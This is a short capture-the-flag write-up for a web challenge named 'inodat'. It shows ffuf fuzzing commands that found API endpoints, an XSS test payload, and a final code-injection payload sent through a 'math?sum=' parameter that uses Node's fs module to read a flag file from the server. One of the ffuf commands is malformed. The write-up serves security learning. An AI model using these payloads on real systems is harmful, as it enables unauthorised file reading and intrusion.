inodat

You should evaluate my application from 1 to 100.

I opened the web app, and all I saw was an image with a pretty obvious description: "Welcome to the Inodat basic API." So, I started fuzzing the application using ffuf. After a few seconds, I found the /api directory, but there was nothing interesting there, so I did it again.

ffuf -w /usr/share/seclists/Discovery/Web-Content/api/objects.txt:FUZZ -u 'http://34.107.71.117:30567/api/FUZZ' -mc 200

I fuzzed multiple times and changed the wordlists just to make sure I didn't miss anything. Here are the interesting files I found:

/api/v1/math
/api/v1/base64e
/api/v1/base64d

At first, I thought it was a dead end, but then I started fuzzing again, this time focusing on GET parameters.

ffuf -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://http://34.107.71.117:32660/api/v1/base64e?FUZZ' -fs

Parameters that I found:

/api/v1/base64e?data=
/api/v1/base64d?data=
/api/v1/math?sum=

Now comes the real challenge. The base64e and base64d endpoints encode and decode my input. I first tried XSS payloads (<script>alert(1)</script>), and it worked, but I wasn't sure how to proceed further and I was blocked.

This was quite easy to identify the type of attack, but to perform it I need some time.

After a while I found a way to exploit the app.

Final payload:

http://34.107.71.117:32660/api/v1/math?sum=root.Buffer.from(require('fs').readFileSync('/home/ctf/secret_flag_folder_adsasdohi/flag.txt')).toString('ascii')

Helpful Resources

Server-Side Template InjectionPortSwigger Research

A Pentester’s Guide to Server Side Template Injection (SSTI) | Cobalt Blog

Previousold-tickets Nextpattern

Last updated 11 months ago